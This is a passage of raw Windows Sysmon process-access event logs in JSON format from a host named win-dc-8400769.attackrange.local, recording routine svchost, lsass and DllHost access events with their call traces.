C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.192","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2437,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.207\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.207","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2438,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.207\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.207","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2439,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.207\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.207","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2440,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.207\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.207","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2441,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.207\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.207","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2442,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.207\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.207","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2443,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.207\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.207","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2444,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.207\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1076-5F25-0000-00108C240400}\r\nTargetProcessId: 2180\r\nTargetImage: C:\\Windows\\system32\\DllHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 